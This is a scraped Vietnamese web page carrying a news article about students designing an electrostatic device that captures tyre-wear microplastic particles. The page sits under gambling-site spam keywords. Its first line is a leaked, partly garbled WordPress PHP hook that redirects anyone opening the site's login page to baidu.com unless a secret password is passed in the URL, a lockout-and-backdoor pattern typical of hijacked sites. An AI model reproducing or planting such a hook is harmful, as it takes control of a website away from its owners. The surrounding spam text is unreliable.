//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Sinh viên phát triển một thiết bị hấp thụ mài mòn lốp xe | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

Sinh viên phát triển một thiết bị hấp thụ mài mòn lốp xe

Ma sát giữa cao su và đường có thể giúp xe không bị trượt, nhưng nếu ma sát nhiều hơn cao su sẽ phá hủy cấu trúc của nó, tạo thành vi nhựa. Ngoài những hạt cao su bám đường còn có một số hạt nhỏ lọt vào không khí. Các sinh viên của Tyre Collective đã phát hiện ra rằng các hạt cao su mang điện tích dương, vì vậy nhóm đã chế tạo thiết bị này bằng cách thu hút nó với một bộ khuếch tán được trang bị lá tĩnh điện. Thiết bị tiêu thụ rất ít điện năng và có thể dễ dàng lấy năng lượng từ ắc quy ô tô.

Video này mô phỏng quá trình của các hạt vi nhựa trong lốp xe.

Bụi lốp được coi là chất ô nhiễm vi nhựa lớn thứ hai. Mỗi khi bạn phanh, tăng tốc và rẽ, các hạt này sẽ bay đi và sau đó được đưa vào nước, thức ăn và không khí thở. Nguồn gây ô nhiễm ô tô trong tương lai không phải là khí thải, mà là lốp xe.

Hình ảnh 3D của thiết bị.

Thiết bị được lắp trên bánh trước và bánh sau, và phải thay lốp theo lốp. Góc quay của lốp khi xe quay vòng. Do đó, mặt trước của thiết bị sẽ phải tương ứng với chuyển động quay của các bánh xe, cho phép chuyển động và quay do hệ thống treo. Các hạt được hút lại được lưu trữ trong bể sau đó có thể được làm sạch trong quá trình đóng rắn. Nhóm đang cố gắng tìm cách tạo ra một hệ thống tự phục vụ tự quản.

Ánh Dương (Theo Motor1)

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365